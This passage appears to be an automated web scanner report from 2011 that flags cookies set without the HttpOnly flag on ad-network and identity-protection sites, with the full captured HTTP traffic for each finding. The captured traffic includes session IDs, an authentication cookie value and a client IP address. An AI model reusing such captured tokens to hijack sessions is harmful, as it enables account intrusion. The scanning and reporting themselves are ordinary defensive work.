Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5E86DC9CC3BD60FE3A06221325A71F08; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:29:25 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

14.2. http://affiliate.idgtracker.com/rd/r.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=g7dpq2uc614mccbr73j7na1id6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test
Location: http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.3. http://event.adxpose.com/event.flow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_15&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=0%2C0&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=4D2F096A244DBA369FB4DA24E6E71E58

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37CA52C814AA647559229DADBB815529; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Sun, 24 Apr 2011 12:26:22 GMT


14.4. http://img.securepaynet.net/image.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.securepaynet.net
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.296151316862624&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=30&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet HTTP/1.1
Host: img.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; path=/
Set-Cookie: pagecount=1; domain=.securepaynet.net; path=/
Set-Cookie: fb_pagecount=1; path=/
Set-Cookie: actioncount=; domain=.securepaynet.net; path=/
Set-Cookie: fb_actioncount=; path=/
Set-Cookie: app_pathway=; domain=.securepaynet.net; path=/
Set-Cookie: fb_session=S_TOUCH=04/24/2011 12:42:14&pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b&V_DATE=04/24/2011 05:42:14; path=/
Set-Cookie: isc=kro_2011; domain=.securepaynet.net; path=/
Set-Cookie: visitor=vid=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; expires=Mon, 23-Apr-2012 12:42:14 GMT; path=/
Set-Cookie: traffic=; domain=.securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sun, 24 Apr 2011 12:42:13 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.5. http://leadback.netseer.com/dsatserving2/servlet/log

Summary

Severity:   Low
Confidence:   Firm
Host:   http://leadback.netseer.com
Path:   /dsatserving2/servlet/log

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/log?pxid=1124&nlt=ltpx&url=http%3A%2F%2Fwww.identityguard.com%2Fipages%2Fle4%2Fletp30daysfree1.html%3Fmktp%3DNext%26utm_medium%3Daffiliates%26hid%3D205557649%26campid%3D13%26c1%3Did4%2B106163471CD1%26c2%3DCD1%26cenhp1%3D1&impt=0&imps=0 HTTP/1.1
Host: leadback.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6FE9E355E2568F5F32FAD5F08891554D.dsat4; Path=/dsatserving2
Set-Cookie: netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Content-Type: image/png
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Length: 70

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.

14.6. https://secure.identityguard.com/EnrollmentStep1

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:36:12 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000KToyasEeVy_fQHf6TuSK9Mc:14ej3pg70; Path=/
Set-Cookie: REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; Expires=Sun, 08 May 2011 03:35:20 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002777198=100000002777198%2cVoEQEMAaxiiOxH5%2fHe03xssaVwY%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002777198=100000002777198%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblgaG4LolUzuM7owtK6Gi%2bVaq7muVpgRvizF3GEYunmq5qAGshvG%2fXVXEJobjTsDIa%0auhm1cgxjc8Dg7Bta%2bhk6VW6qOQMB228jrA07GAd7ulM%2f%2bYbi2c00FUf8MBs4lni1kKc%2bItFLUY8t%0a%2bqcUB9ES; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


14.7. https://secure.lifelock.com/portal/login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...

14.8. http://www.dictof.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dictof.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...

14.9. https://www.econsumer.equifax.com/otc/landing.ehtml

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/landing.ehtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1
Host: www.econsumer.equifax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:12:19 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=857e5247922609777fdaaf17d37b; Path=/otc; Secure
Set-cookie: JROUTE=ush2; Path=/otc; Secure
Content-Length: 76392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Per
...[SNIP]...

14.10. http://www.hotelclub.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232704
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: anon=2434808611872011042422094; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=IDCOCPBACOINJJKHPNLDLKKO; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

14.11. http://www.identityguard.com/ipages/le4/styles/ie.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.identityguard.com
Path:   /ipages/le4/styles/ie.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipages/le4/styles/ie.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQASBDART=HKBCAEEBEEDNPAMOIACLELJF; path=/
Date: Sun, 24 Apr 2011 03:11:05 GMT
Content-Length: 92

<script type= "text/javascript"> window.location = "http://www.identityguard.com" </script>

14.12. http://www.lunlizy.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lunlizy.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lunlizy.net

Response

HTTP/1.1 302 Object moved
Date: Sun, 24 Apr 2011 12:43:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: Index.html
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQASRQRR=MEGPOLLBINIIAPFAMNIIPEEG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Index.html">here</a>.</body>

14.13. http://www.nextadvisor.com/link.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.php?kw=blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro&category=security&link=eset&id=305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:10:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=fbb3b93f7303ec3062b1cef62bec6e33; path=/
